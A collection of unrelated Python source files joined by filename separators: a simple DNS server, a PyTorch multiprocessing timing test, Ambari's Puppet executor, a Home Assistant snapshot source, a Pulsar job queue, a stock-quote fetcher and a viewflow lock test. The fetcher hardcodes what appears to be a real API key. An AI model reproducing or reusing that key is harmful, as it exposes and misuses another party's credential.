logging.error("Error handling reques" + str(e) )
logging.error(str(traceback.print_exc()))
class TCPRequestHandler(BaseRequestHandler):
def get_data(self):
data = self.request.recv(8192).strip()
sz = struct.unpack('>H', data[:2])[0]
if sz < len(data) - 2:
raise Exception("Wrong size of TCP packet")
elif sz > len(data) - 2:
raise Exception("Too big TCP packet")
return data[2:]
def send_data(self, data):
sz = struct.pack('>H', len(data))
return self.request.sendall(sz + data)
class UDPRequestHandler(BaseRequestHandler):
def get_data(self):
return self.request[0].strip()
def send_data(self, data):
return self.request[1].sendto(data, self.client_address)
def main():
global DOMAN_NAME, IP, NS
parser = argparse.ArgumentParser(description='Start a DNS server implemented in Python. DNS servers usually use UDP on port 53.')
parser.add_argument('--port', default=53, type=int, help='The port to listen on.')
parser.add_argument('--tcp', action='store_true', help='Listen to TCP connections.')
parser.add_argument('--udp', action='store_true', help='Listen to UDP datagrams.')
parser.add_argument('--DNS', type=str, help='DNS address for the server.')
parser.add_argument('--IP', type=str, help='IP address for the server.')
parser.add_argument('--NS', type=str, help='NS address for the server.')
args = parser.parse_args()
if not (args.udp or args.tcp): parser.error("Please select at least one of --udp or --tcp.")
if not args.DNS: parser.error("Please add a DNS")
if not args.IP: parser.error("Please add an IP")
if not args.NS: parser.error("Please add a NS")
# arguments must be parsed before they are read, and the module-level globals
# (used by dns_response) are what actually need updating
DOMAN_NAME = args.DNS
IP = args.IP
NS = args.NS
logging.info("Starting nameserver...")
servers = []
if args.udp: servers.append(SocketServer.ThreadingUDPServer(('', args.port), UDPRequestHandler))
if args.tcp: servers.append(SocketServer.ThreadingTCPServer(('', args.port), TCPRequestHandler))
for s in servers:
thread = threading.Thread(target=s.serve_forever) # that thread will start one more thread for each request
thread.daemon = True # exit the server thread when the main thread terminates
thread.start()
logging.info("%s server loop running in thread: %s" % (s.RequestHandlerClass.__name__[:3], thread.name))
try:
while 1:
time.sleep(1)
sys.stderr.flush()
sys.stdout.flush()
except KeyboardInterrupt:
pass
finally:
for s in servers:
s.shutdown()
if __name__ == '__main__':
main()
|
test_mp.py
|
import numpy as np
import torch
import torch.multiprocessing as mp
mp.set_start_method('spawn', force=True)
import time
import uuid
import queue
import logging
import cv2
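# Note (added): the "spawn" start method above is required because CUDA cannot be
# used in processes created with fork once the parent has initialized it. Also,
# share_memory_() is a no-op for CUDA tensors (they are shared via CUDA IPC when put
# on a torch.multiprocessing queue); it only matters for CPU tensors.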
def test_input_output(idx, qin, qout):
print(f'{idx} start')
duration = 0
count = 0
while True:
start = time.time()
tensor = qin.get()
print(f"{idx} get")
tensor = torch.nn.functional.interpolate(tensor, size=(640,352))
qout.put(tensor)
print(f"{idx} put")
duration += time.time()-start
count += 1
if count == 10:
break
time.sleep(3)
print(f'{idx} avg {(duration/count)*1000:.1f}ms')
def test_output(idx, qout):
print(f'{idx} start')
duration = 0
for _ in range(10):
start = time.time()
data = np.ones((1920,1080,3), dtype=np.uint8)
data = cv2.resize(data, (352,640))
tensor = torch.from_numpy(data).cuda()
tensor = tensor.permute(2,0,1).unsqueeze(0).share_memory_()
qout.put(tensor)
del tensor
duration += time.time()-start
print(f'{idx} avg {(duration/10)*1000:.1f}ms')
time.sleep(60)
def main_input_output():
qins = []
qouts = []
ps = []
inputs = []
for i in range(5):
qin = mp.Queue(10)
qout = mp.Queue(10)
p = mp.Process(target=test_input_output, args=(i, qin, qout,))
a = torch.rand(1,3,1920,1080).cuda()
p.start()
ps.append(p)
qins.append(qin)
qouts.append(qout)
inputs.append(a)
time.sleep(1)
start = time.time()
for _ in range(10):
for a, qin in zip(inputs, qins):
a.share_memory_()
qin.put(a)
for qout in qouts:
tensor = qout.get()
# print('shared', a.is_shared())
# print("put")
print('put total time', (time.time() - start)/10)
for p in ps:
p.join()
p.close()
def main_output():
qouts = []
ps = []
for i in range(5):
qout = mp.Queue(10)
p = mp.Process(target=test_output, args=(i, qout,))
p.start()
ps.append(p)
qouts.append(qout)
time.sleep(1)
start = time.time()
count = 0
while True:
for qout in qouts:
try:
tensor = qout.get_nowait()
count += 1
except queue.Empty:
pass
if count == 50:
break
print('get total time', (time.time() - start)/50)
for p in ps:
p.join()
p.close()
if __name__ == "__main__":
main_output()
|
PuppetExecutor.py
|
#!/usr/bin/env python2.6
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
import os.path
import logging
import subprocess
import pprint
import threading
from threading import Thread
from shell import shellRunner
import manifestGenerator
from RepoInstaller import RepoInstaller
from Grep import Grep
import shell
JAVANOTVALID_MSG = "Cannot access JDK! Make sure you have permission to execute {0}/bin/java"
logger = logging.getLogger()
class PuppetExecutor:
""" Class that executes the commands that come from the server using puppet.
This is the class that provides the pluggable point for executing the puppet"""
grep = Grep()
NO_ERROR = "none"
def __init__(self, puppetModule, puppetInstall, facterInstall, tmpDir, config):
self.puppetModule = puppetModule
self.puppetInstall = puppetInstall
self.facterInstall = facterInstall
self.tmpDir = tmpDir
self.reposInstalled = False
self.config = config
self.modulesdir = self.puppetModule + "/modules"
self.event = threading.Event()
self.last_puppet_has_been_killed = False
self.sh = shellRunner()
self.puppet_timeout = config.get("puppet", "timeout_seconds")
def configureEnviron(self, environ):
if not self.config.has_option("puppet", "ruby_home"):
return environ
ruby_home = self.config.get("puppet", "ruby_home")
if os.path.exists(ruby_home):
"""Only update ruby home if the config is configured"""
path = os.environ["PATH"]
if not ruby_home in path:
environ["PATH"] = ruby_home + os.path.sep + "bin" + ":"+environ["PATH"]
environ["MY_RUBY_HOME"] = ruby_home
return environ
def getPuppetBinary(self):
puppetbin = os.path.join(self.puppetInstall, "bin", "puppet")
if os.path.exists(puppetbin):
return puppetbin
else:
logger.info("Using default puppet on the host : " + puppetbin
+ " does not exist.")
return "puppet"
def discardInstalledRepos(self):
"""
Makes agent to forget about installed repos.
So the next call of generate_repo_manifests() will definitely
install repos again
"""
self.reposInstalled = False
def generate_repo_manifests(self, command, tmpDir, modulesdir, taskId):
# Hack to only create the repo files once
manifest_list = []
if not self.reposInstalled:
repoInstaller = RepoInstaller(command, tmpDir, modulesdir, taskId, self.config)
manifest_list = repoInstaller.generate_repo_manifests()
return manifest_list
def puppetCommand(self, sitepp):
modules = self.puppetModule
puppetcommand = [self.getPuppetBinary(), "apply", "--confdir=" + modules, "--detailed-exitcodes", sitepp]
return puppetcommand
def facterLib(self):
return self.facterInstall + "/lib/"
pass
def puppetLib(self):
return self.puppetInstall + "/lib"
pass
def condenseOutput(self, stdout, stderr, retcode):
grep = self.grep
if stderr == self.NO_ERROR:
result = grep.tail(stdout, grep.OUTPUT_LAST_LINES)
else:
result = grep.grep(stdout, "fail", grep.ERROR_LAST_LINES_BEFORE, grep.ERROR_LAST_LINES_AFTER)
result = grep.cleanByTemplate(result, "warning")
if result is None: # Second try
result = grep.grep(stdout, "err", grep.ERROR_LAST_LINES_BEFORE, grep.ERROR_LAST_LINES_AFTER)
result = grep.cleanByTemplate(result, "warning")
filteredresult = grep.filterMarkup(result)
return filteredresult
def isSuccessfull(self, returncode):
return not self.last_puppet_has_been_killed and (returncode == 0 or returncode == 2)
def run_manifest(self, command, file, tmpoutfile, tmperrfile):
result = {}
taskId = 0
if command.has_key("taskId"):
taskId = command['taskId']
puppetEnv = os.environ
#Install repos
repo_manifest_list = self.generate_repo_manifests(command, self.tmpDir, self.modulesdir, taskId)
puppetFiles = list(repo_manifest_list)
puppetFiles.append(file)
#Run all puppet commands, from manifest generator and for repos installation
#Appending outputs and errors, exitcode - maximal from all
for puppetFile in puppetFiles:
self.runPuppetFile(puppetFile, result, puppetEnv, tmpoutfile, tmperrfile)
# Check if one of the puppet command fails and error out
if not self.isSuccessfull(result["exitcode"]):
break
if self.isSuccessfull(result["exitcode"]):
# Check if all the repos were installed or not and reset the flag
self.reposInstalled = True
logger.info("ExitCode : " + str(result["exitcode"]))
return result
def isJavaAvailable(self, command):
javaExecutablePath = "{0}/bin/java".format(command)
return not self.sh.run([javaExecutablePath, '-version'])['exitCode']
def runCommand(self, command, tmpoutfile, tmperrfile):
# After installing we must have jdk available for start/stop/smoke
if command['roleCommand'] != "INSTALL":
java64_home = None
if ('global' in command['configurations']) and ('java64_home' in command['configurations']['global']):
java64_home = str(command['configurations']['global']['java64_home']).strip()
if java64_home is None or not self.isJavaAvailable(java64_home):
if java64_home is None:
errMsg = "Cannot access JDK! Make sure java64_home is specified in global config"
else:
errMsg = JAVANOTVALID_MSG.format(java64_home)
return {'stdout': '', 'stderr': errMsg, 'exitcode': 1}
pass
pass
taskId = 0
if command.has_key("taskId"):
taskId = command['taskId']
siteppFileName = os.path.join(self.tmpDir, "site-" + str(taskId) + ".pp")
errMsg = manifestGenerator.generateManifest(command, siteppFileName,
self.modulesdir, self.config)
if not errMsg:
result = self.run_manifest(command, siteppFileName, tmpoutfile, tmperrfile)
else:
result = {'stdout': '', 'stderr': errMsg, 'exitcode': 1}
return result
def runPuppetFile(self, puppetFile, result, puppetEnv, tmpoutfile, tmperrfile):
""" Run the command and make sure the output gets propagated"""
puppetcommand = self.puppetCommand(puppetFile)
rubyLib = ""
if os.environ.has_key("RUBYLIB"):
rubyLib = os.environ["RUBYLIB"]
logger.debug("RUBYLIB from Env " + rubyLib)
if not (self.facterLib() in rubyLib):
rubyLib = rubyLib + ":" + self.facterLib()
if not (self.puppetLib() in rubyLib):
rubyLib = rubyLib + ":" + self.puppetLib()
tmpout = open(tmpoutfile, 'w')
tmperr = open(tmperrfile, 'w')
puppetEnv["RUBYLIB"] = rubyLib
puppetEnv = self.configureEnviron(puppetEnv)
logger.debug("Setting RUBYLIB as: " + rubyLib)
logger.info("Running command " + pprint.pformat(puppetcommand))
puppet = self.lauch_puppet_subprocess(puppetcommand, tmpout, tmperr, puppetEnv)
logger.info("Command started with PID: " + str(puppet.pid))
logger.debug("Launching watchdog thread")
self.event.clear()
self.last_puppet_has_been_killed = False
thread = Thread(target = self.puppet_watchdog_func, args = (puppet, ))
thread.start()
# Waiting for process to finished or killed
puppet.communicate()
self.event.set()
thread.join()
# Building results
error = self.NO_ERROR
returncode = 0
if not self.isSuccessfull(puppet.returncode):
returncode = puppet.returncode
error = open(tmperrfile, 'r').read()
logging.error("Error running puppet: \n" + str(error))
pass
if self.last_puppet_has_been_killed:
error = str(error) + "\n Puppet has been killed due to timeout"
returncode = 999
if result.has_key("stderr"):
result["stderr"] = result["stderr"] + os.linesep + str(error)
else:
result["stderr"] = str(error)
puppetOutput = open(tmpoutfile, 'r').read()
logger.debug("Output from puppet :\n" + puppetOutput)
logger.info("Puppet execution process with pid %s exited with code %s." %
(str(puppet.pid), str(returncode)))
if result.has_key("exitcode"):
result["exitcode"] = max(returncode, result["exitcode"])
else:
result["exitcode"] = returncode
condensed = self.condenseOutput(puppetOutput, error, returncode)
if result.has_key("stdout"):
result["stdout"] = result["stdout"] + os.linesep + str(condensed)
else:
result["stdout"] = str(condensed)
return result
def lauch_puppet_subprocess(self, puppetcommand, tmpout, tmperr, puppetEnv):
"""
Creates subprocess with given parameters. This functionality was moved to separate method
to make possible unit testing
"""
return subprocess.Popen(puppetcommand,
stdout=tmpout,
stderr=tmperr,
env=puppetEnv)
def puppet_watchdog_func(self, puppet):
self.event.wait(float(self.puppet_timeout))
if puppet.returncode is None:
logger.error("Task timed out, killing process with PID: " + str(puppet.pid))
shell.kill_process_with_children(puppet.pid)
self.last_puppet_has_been_killed = True
pass
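# Note (added): with "--detailed-exitcodes", "puppet apply" exits with 0 (no changes),
# 2 (changes applied successfully), 4 (failures) or 6 (changes plus failures), which
# is why isSuccessfull() above treats both 0 and 2 as success.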
def main():
logging.basicConfig(level=logging.DEBUG)
#test code
jsonFile = open('test.json', 'r')
jsonStr = jsonFile.read()
# Below is for testing only.
puppetInstance = PuppetExecutor("/home/centos/ambari_repo_info/ambari-agent/src/main/puppet/",
"/usr/",
"/root/workspace/puppet-install/facter-1.6.10/",
"/tmp")
jsonFile = open('test.json', 'r')
jsonStr = jsonFile.read()
parsedJson = json.loads(jsonStr)
result = puppetInstance.runCommand(parsedJson, '/tmp/out.txt', '/tmp/err.txt')
logger.debug(result)
if __name__ == '__main__':
main()
|
hasource.py
|
import os.path
from .snapshots import HASnapshot, Snapshot, AbstractSnapshot
from .config import Config
from .time import Time
from .model import SnapshotSource, CreateOptions
from typing import Optional, List, Dict
from threading import Lock, Thread
from .harequests import HaRequests
from .exceptions import LogicError
from .helpers import formatException, touch
from .exceptions import SnapshotInProgress, UploadFailed, ensureKey
from .globalinfo import GlobalInfo
from .const import SOURCE_HA
from datetime import timedelta
from io import IOBase
from requests import HTTPError
from .settings import Setting
from .password import Password
from .snapshotname import SnapshotName
class PendingSnapshot(AbstractSnapshot):
def __init__(self, name, date, snapshotType, protected, start_time):
super().__init__(
name=name,
slug="pending",
date=date,
size="pending",
source=SOURCE_HA,
snapshotType=snapshotType,
version="",
protected=protected,
retained=False,
uploadable=False,
details={})
self._failed = False
self._complete = False
self._exception = None
self._start_time = start_time
self._failed_at = None
def startTime(self):
return self._start_time
def failed(self, exception, time):
self._failed = True
self._exception = exception
self._failed_at = time
def getFailureTime(self):
return self._failed_at
def complete(self):
self._complete = True
def isComplete(self):
return self._complete
def isFailed(self):
return self._failed
def status(self):
if self._complete:
return "Created"
if self._failed:
return "Failed!"
return "Pending"
class HaSource(SnapshotSource[HASnapshot]):
"""
Stores logic for interacting with the Hass.io add-on API
"""
def __init__(self, config: Config, time: Time, ha: HaRequests, info: GlobalInfo):
super().__init__()
self.config: Config = config
self.snapshot_thread: Thread = None
self.pending_snapshot: Optional[PendingSnapshot] = None
self.pending_snapshot_error: Optional[Exception] = None
self.pending_snapshot_slug: Optional[str] = None
self.self_info = None
self.host_info = None
self.ha_info = None
self.super_info = None
self.lock: Lock = Lock()
self.time = time
self.harequests = ha
self.last_slugs = set()
self.retained = []
self.cached_retention = {}
self._info = info
self.pending_options = {}
self._temporary_extra_server = False
def runTemporaryServer(self):
return self._temporary_extra_server
def check(self) -> bool:
# determine if the pending snapshot has timed out, but not if we're still waiting for the request
pending = self.pending_snapshot
if pending is not None:
if self.snapshot_thread is None or not self.snapshot_thread.is_alive():
if self.time.now() > pending.startTime() + timedelta(seconds=self.config.get(Setting.PENDING_SNAPSHOT_TIMEOUT_SECONDS)):
self._killPending()
self.trigger()
if pending.isFailed() and self.time.now() >= pending.getFailureTime() + timedelta(seconds=self.config.get(Setting.FAILED_SNAPSHOT_TIMEOUT_SECONDS)):
self._killPending()
self.trigger()
if pending.isComplete():
self._killPending()
self.trigger()
return super().check()
def name(self) -> str:
return SOURCE_HA
def maxCount(self) -> None:
return self.config.get(Setting.MAX_SNAPSHOTS_IN_HASSIO)
def enabled(self) -> bool:
return True
def create(self, options: CreateOptions) -> HASnapshot:
self._refreshInfo()
if options.name_template is None or len(options.name_template) == 0:
options.name_template = self.config.get(Setting.SNAPSHOT_NAME)
self.info("Requesting a new snapshot")
data = self._buildSnapshotInfo(options)
with self.lock:
if self.snapshot_thread is not None and self.snapshot_thread.is_alive():
self.info("A snapshot was already in progress")
raise SnapshotInProgress()
if self.pending_snapshot is not None:
if not self.pending_snapshot.isFailed() and not self.pending_snapshot.isComplete():
raise SnapshotInProgress()
self.pending_snapshot_error = None
self.pending_snapshot_slug = None
self.pending_snapshot = None
self.snapshot_thread = Thread(target=self._requestSnapshot, args=data, name="Snapshot Request Thread")  # data is already a tuple; its items become the positional args
self.snapshot_thread.setDaemon(True)
self.snapshot_thread.start()
self.snapshot_thread.join(timeout=self.config.get(Setting.NEW_SNAPSHOT_TIMEOUT_SECONDS))
with self.lock:
if self.pending_snapshot_error is not None:
if self._isHttp400(self.pending_snapshot_error):
self.info("A snapshot was already in progress (created outside this addon)")
# A snapshot was started "outside" of the add-on, so create a stub that we'll later associate with the pending snapshot once it shows up
self.pending_snapshot = PendingSnapshot("Pending Snapshot", options.when, "Unknown", False, self.time.now())
raise SnapshotInProgress()
else:
raise self.pending_snapshot_error
elif self.pending_snapshot_slug:
# The snapshot completed while we waited, so now we should be able to just read it.
snapshot = self.harequests.snapshot(self.pending_snapshot_slug)
snapshot.setOptions(options)
return snapshot
else:
self.pending_snapshot = PendingSnapshot(data[0]['name'], options.when, data[2], data[3], self.time.now())
self.pending_snapshot.setOptions(options)
return self.pending_snapshot
def _isHttp400(self, e):
if not isinstance(e, HTTPError):
return False
return e.response.status_code == 400
def get(self) -> Dict[str, HASnapshot]:
# TODO: refresh settings here instead of during snapshot creation. maybe cache it with a timeout
slugs = set()
retained = []
snapshots: Dict[str, HASnapshot] = {}
for snapshot in self.harequests.snapshots()['snapshots']:
slug = snapshot['slug']
slugs.add(slug)
item = self.harequests.snapshot(slug)
if slug in self.pending_options:
item.setOptions(self.pending_options[slug])
snapshots[slug] = item
if item.retained():
retained.append(item.slug())
if len(slugs - self.last_slugs) > 0:
# At least one item was added since the last query
self.last_slugs = slugs
if self.pending_snapshot is not None:
self._killPending()
if self.pending_snapshot:
snapshots[self.pending_snapshot.slug()] = self.pending_snapshot
for slug in retained:
if not self.config.isRetained(slug):
self.config.setRetained(slug, False)
return snapshots
def delete(self, snapshot: Snapshot):
slug = self._validateSnapshot(snapshot).slug()
self.info("Deleting '{0}' from Home Assistant".format(snapshot.name()))
self.harequests.delete(slug)
snapshot.removeSource(self.name())
def save(self, snapshot: Snapshot, stream: IOBase) -> HASnapshot:
self.info("Downloading '{0}'".format(snapshot.name()))
self._info.upload(0)
resp = None
try:
snapshot.overrideStatus("Downloading {0}%", stream)
resp = self.harequests.upload(stream)
except Exception as e:
self.error(formatException(e))
snapshot.clearStatus()
if resp and 'slug' in resp and resp['slug'] == snapshot.slug():
self.config.setRetained(snapshot.slug(), True)
return self.harequests.snapshot(snapshot.slug())
else:
raise UploadFailed()
def read(self, snapshot: Snapshot) -> IOBase:
item = self._validateSnapshot(snapshot)
return self.harequests.download(item.slug())
def retain(self, snapshot: Snapshot, retain: bool) -> None:
item: HASnapshot = self._validateSnapshot(snapshot)
item._retained = retain
self.config.setRetained(snapshot.slug(), retain)
def init(self):
self._refreshInfo()
# check if the upgrade file is present.
self._temporary_extra_server = False
if not os.path.exists(self.config.get(Setting.INGRESS_TOKEN_FILE_PATH)):
# No upgrade file, so check if drive creds are saved.
if os.path.exists(self.config.get(Setting.CREDENTIALS_FILE_PATH)):
# it's an upgrade, so add the extra server option.
self._temporary_extra_server = True
else:
# It's a new install, so write the upgrade file and never check again.
touch(self.config.get(Setting.INGRESS_TOKEN_FILE_PATH))
def refresh(self):
self._refreshInfo()
def _refreshInfo(self) -> None:
self.self_info = self.harequests.selfInfo()
self.host_info = self.harequests.info()
self.ha_info = self.harequests.haInfo()
self.super_info = self.harequests.supervisorInfo()
self.config.update(ensureKey("options", self.self_info, "addon metadata"))
self._info.ha_port = ensureKey("port", self.ha_info, "Home Assistant metadata")
self._info.ha_ssl = ensureKey("ssl", self.ha_info, "Home Assistant metadata")
self._info.addons = ensureKey("addons", self.super_info, "Supervisor metadata")
self._info.slug = ensureKey("slug", self.self_info, "addon metadata")
self._info.url = self.getAddonUrl()
self._info.addDebugInfo("self_info", self.self_info)
self._info.addDebugInfo("host_info", self.host_info)
self._info.addDebugInfo("ha_info", self.ha_info)
self._info.addDebugInfo("super_info", self.super_info)
def getAddonUrl(self):
"""
Returns the relative path to the add-on, for the purpose of linking to the add-on page from within Home Assistant.
"""
return "/hassio/ingress/" + str(self._info.slug)
def getFullAddonUrl(self):
return self._haUrl() + "hassio/ingress/" + str(self._info.slug)
def getFullRestoreLink(self):
return self._haUrl() + "hassio/snapshots"
def _haUrl(self):
if self._info.ha_ssl:
protocol = "https://"
else:
protocol = "http://"
return "".join([protocol, "{host}:", str(self._info.ha_port), "/"])
def _validateSnapshot(self, snapshot) -> HASnapshot:
item: HASnapshot = snapshot.getSource(self.name())
if not item:
raise LogicError("Requested to do something with a snapshot from Home Assistant, but the snapshot has no Home Assistant source")
return item
def _requestSnapshot(self, *args) -> None:
data = args
options: CreateOptions = data[1]
try:
slug = ensureKey("slug", self.harequests.createSnapshot(data[0]), "Hass.io's create snapshot response")
with self.lock:
self.pending_snapshot_slug = slug
self.config.setRetained(slug, options.retain_sources.get(self.name(), False))
self.pending_options[slug] = options
if self.pending_snapshot:
self.pending_snapshot.complete()
self.info("Snapshot finished")
self.trigger()
except Exception as e:
with self.lock:
if self.pending_snapshot:
self.pending_snapshot.failed(e, self.time.now())
if self._isHttp400(e):
self.warn("A snapshot was already in progress")
else:
self.error("Snapshot failed:")
self.error(formatException(e))
self.pending_snapshot_error = e
def _buildSnapshotInfo(self, options: CreateOptions):
addons: List[str] = []
for addon in self.super_info.get('addons', {}):
addons.append(addon['slug'])
request_info = {
'addons': [],
'folders': []
}
folders = ["ssl", "share", "homeassistant", "addons/local"]
type_name = "Full"
for folder in folders:
if folder not in self.config.get(Setting.EXCLUDE_FOLDERS):
request_info['folders'].append(folder)
else:
type_name = "Partial"
for addon in addons:
if addon not in self.config.get(Setting.EXCLUDE_ADDONS):
request_info['addons'].append(addon)
else:
type_name = "Partial"
if type_name == "Full":
del request_info['addons']
del request_info['folders']
protected = False
password = Password(self.config).resolve()
if password:
request_info['password'] = password
name = SnapshotName().resolve(type_name, options.name_template, self.time.toLocal(options.when), self.host_info)
request_info['name'] = name
return (request_info, options, type_name, protected)
def _killPending(self) -> None:
with self.lock:
self.pending_snapshot_error = None
self.pending_snapshot_slug = None
self.pending_snapshot = None
|
queued.py
|
import os
import multiprocessing
from six.moves import queue
import threading
import traceback
from pulsar.managers.unqueued import Manager
from logging import getLogger
log = getLogger(__name__)
STOP_SIGNAL = object()
RUN = object()
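# Note (added): STOP_SIGNAL and RUN are sentinel objects; identity checks such as
# "op is STOP_SIGNAL" in run_next() make it unambiguous whether a queue entry is a
# shutdown request or a job to run.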
# Number of concurrent jobs used by default for
# QueueManager.
DEFAULT_NUM_CONCURRENT_JOBS = 1
JOB_FILE_COMMAND_LINE = "command_line"
class QueueManager(Manager):
"""
A job manager that queues up jobs directly (i.e. does not use an
external queuing software such PBS, SGE, etc...).
"""
manager_type = "queued_python"
def __init__(self, name, app, **kwds):
super(QueueManager, self).__init__(name, app, **kwds)
num_concurrent_jobs = kwds.get('num_concurrent_jobs', DEFAULT_NUM_CONCURRENT_JOBS)
if num_concurrent_jobs == '*':
num_concurrent_jobs = multiprocessing.cpu_count()
else:
num_concurrent_jobs = int(num_concurrent_jobs)
self._init_worker_threads(num_concurrent_jobs)
def _init_worker_threads(self, num_concurrent_jobs):
self.work_queue = queue.Queue()
self.work_threads = []
for i in range(num_concurrent_jobs):
worker = threading.Thread(target=self.run_next)
worker.daemon = True
worker.start()
self.work_threads.append(worker)
def launch(self, job_id, command_line, submit_params={}, dependencies_description=None, env=[]):
command_line = self._prepare_run(job_id, command_line, dependencies_description=dependencies_description, env=env)
try:
self._job_directory(job_id).store_metadata(JOB_FILE_COMMAND_LINE, command_line)
except Exception:
log.info("Failed to persist command line for job %s, will not be able to recover." % job_id)
self.work_queue.put((RUN, (job_id, command_line)))
def _recover_active_job(self, job_id):
command_line = self._job_directory(job_id).load_metadata(JOB_FILE_COMMAND_LINE, None)
if command_line:
self.work_queue.put((RUN, (job_id, command_line)))
else:
raise Exception("Cannot recover job with id %s" % job_id)
def shutdown(self, timeout=None):
for i in range(len(self.work_threads)):
self.work_queue.put((STOP_SIGNAL, None))
for worker in self.work_threads:
worker.join(timeout)
if worker.is_alive():
log.warn("Failed to stop worker thread [%s]" % worker)
def run_next(self):
"""
Run the next item in the queue (a job waiting to run).
"""
while 1:
(op, obj) = self.work_queue.get()
if op is STOP_SIGNAL:
return
try:
(job_id, command_line) = obj
try:
os.remove(self._job_file(job_id, JOB_FILE_COMMAND_LINE))
except Exception:
log.exception("Running command but failed to delete - command may rerun on Pulsar boot.")
# _run will not do anything if job has been cancelled.
self._run(job_id, command_line, async=False)
except:
log.warn("Uncaught exception running job with job_id %s" % job_id)
traceback.print_exc()
|
marketHack.py
|
import urllib2
import time
import getopt
import sys
import json
import csv
import os
from multiprocessing import Process, Queue
from db import Database
API_KEY = '114e933ff74d41b9f4bddeeb74c81ccd&symbol'
ITERATIONS = 5
CHUNK_SIZE = 100
SAMPLES = 98
def get_data(url, finished, counter):
try:
finished.put(urllib2.urlopen(url).read().strip())
except Exception:
print("failed retrieving url {}".format(counter))
finished.put(0)
return 0
def define_url():
fields = ''
symbolList = []
fieldList = []
with open('resources/field_list.csv', 'rb') as f:
reader = csv.reader(f)
for row in reader:
fieldList.append(row[0])
for i in range(0, len(fieldList)):
fields = fields +fieldList[i]+ ','
with open('resources/snp_constituents.csv', 'rb') as f:
reader = csv.reader(f)
for row in reader:
symbolList.append(row[0])
symbols = ['', '', '', '', '']
chunk_size = len(symbolList)/ITERATIONS
for i in range(0, chunk_size):
for offset in range(0, ITERATIONS):
symbols[offset] = symbols[offset] + symbolList[offset * chunk_size + i]+','
urls =[]
for offset in range(0, ITERATIONS):
suffix = (API_KEY, symbols[offset], fields)
urls.append('http://marketdata.websol.barchart.com/getQuote.json?apikey=%s&symbols=%s&fields=%s' % suffix)
return urls, symbolList
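# Note (added): define_url() splits the constituent list into ITERATIONS contiguous,
# comma-joined chunks (integer division), one request URL per chunk; any remainder
# symbols when the list is not evenly divisible are silently dropped.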
def create_files(urls, symbolList):
stock_data = []
stock_data_db = {}
time_stamp = time.time()
runTime = time.strftime("%Y%m%d-%H%M%S")
sample = 0
while sample<SAMPLES:
time_stamp = time.time()
finished = Queue()
processes = []
for i in range(ITERATIONS):
p = Process(target=get_data, args=(urls[i], finished, i))
p.start()
processes.append(p)
time.sleep(1)
counter = 1
while finished.qsize() < ITERATIONS:
if counter % 10 == 0:
print ("waiting for {} members to finish".format(ITERATIONS - finished.qsize()))
counter += 1
time.sleep(1)
del stock_data[:]
for i in range(0, ITERATIONS):
stock_data.append(finished.get())
for process in processes:
process.terminate()
jsons = []
for i in range(0, ITERATIONS):
jsons.append(json.loads(stock_data[i]))
results = []
status = 0
for i in range(0, ITERATIONS):
if jsons[i]["status"].values()[1] != 200:
print (jsons[i]["status"].values()[0])
status +=1
if status > 0:
continue
else:
for i in range(0, ITERATIONS):
results.append(jsons[i]["results"])
if sample == 0:
for j in range(0, len(symbolList)):
stock_data_db[symbolList[j].replace(".", "_")] = [results[0][0].keys()]
mydb = Database()
data_type = "full_single_sample"
for i in range(0, len(results[0])):
for j in range(0, ITERATIONS):
stock_data_db[results[j][i].values()[23].replace(".","_")] = results[j][i].values()
ret_val = {"data_type": data_type, "date_and_time": runTime, "time_stamp": time_stamp, "rows": stock_data_db}
mydb.insert_result(ret_val)
sample += 1
print(sample)
time.sleep(20)
print(sample)
#mydb = Database()
data_type = "raw_stock_data"
ret_val = {"data_type": data_type, "date_and_time": runTime, "time_stamp": time_stamp, "rows": stock_data_db,
"samples": SAMPLES}
#mydb.insert_result(retVal)
print("done")
return time_stamp, runTime, ret_val
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "vhc:", ["help", "characters="])
except getopt.GetoptError, err:
print (str(err))
sys.exit(2)
urls, symbolList = define_url()
create_files(urls, symbolList)
if __name__ == "__main__":
main()
|
test_lock.py
|
import os
import threading
import time
import unittest
try:
import queue
except ImportError:
import Queue as queue
import django
from django.db import connection, DatabaseError
from django.test import skipUnlessDBFeature, TransactionTestCase
from viewflow import flow, lock
from viewflow.base import Flow, this
from viewflow.exceptions import FlowLockFailed
@unittest.skipUnless('DATABASE_URL' in os.environ, 'Lock test requires specific database config')
class Test(TransactionTestCase):
class TestFlow(Flow):
start = flow.Start().Next(this.end)
end = flow.End()
def setUp(self):
self.finished = False
self.locked = False
self.process = Test.TestFlow.process_class.objects.create(flow_class=Test.TestFlow)
self.exception_queue = queue.Queue()
def run_with_lock(self, lock_impl):
try:
with lock_impl(Test.TestFlow)(Test.TestFlow, self.process.pk):
while not self.finished:
time.sleep(0.001)
except FlowLockFailed as e:
self.exception_queue.put(e)
finally:
connection.close()
def run_with_lock_and_release(self, lock_impl):
try:
with lock_impl(Test.TestFlow)(Test.TestFlow, self.process.pk):
time.sleep(0.5)
except FlowLockFailed as e:
self.exception_queue.put(e)
finally:
connection.close()
@unittest.skipIf(django.VERSION >= (1, 11), 'disabled due no migration run in dj 1.11+')
@skipUnlessDBFeature('has_select_for_update')
def test_select_for_update_locks(self):
lock_impl = lock.SelectForUpdateLock(attempts=1)
thread1 = threading.Thread(target=self.run_with_lock, args=[lock_impl])
thread2 = threading.Thread(target=self.run_with_lock, args=[lock_impl])
thread1.start()
thread2.start()
try:
self.exception_queue.get(True, 10)
except queue.Empty:
self.fail('No thread was blocked')
finally:
self.finished = True
thread1.join()
thread2.join()
@unittest.skipIf(django.VERSION >= (1, 11), 'disabled due no migration run in dj 1.11+')
@skipUnlessDBFeature('has_select_for_update')
def test_select_for_update_locks_released(self):
lock_impl = lock.SelectForUpdateLock(attempts=4)
thread1 = threading.Thread(
target=self.run_with_lock_and_release,
args=[lock_impl])
thread2 = threading.Thread(
target=self.run_with_lock_and_release,
args=[lock_impl])
thread1.start()
thread2.start()
thread1.join()
thread2.join()
try:
self.exception_queue.get(True, 1)
self.fail('Thread was blocked')
except queue.Empty:
pass
@unittest.skipIf(django.VERSION >= (1, 11), 'disabled due no migration run in dj 1.11+')
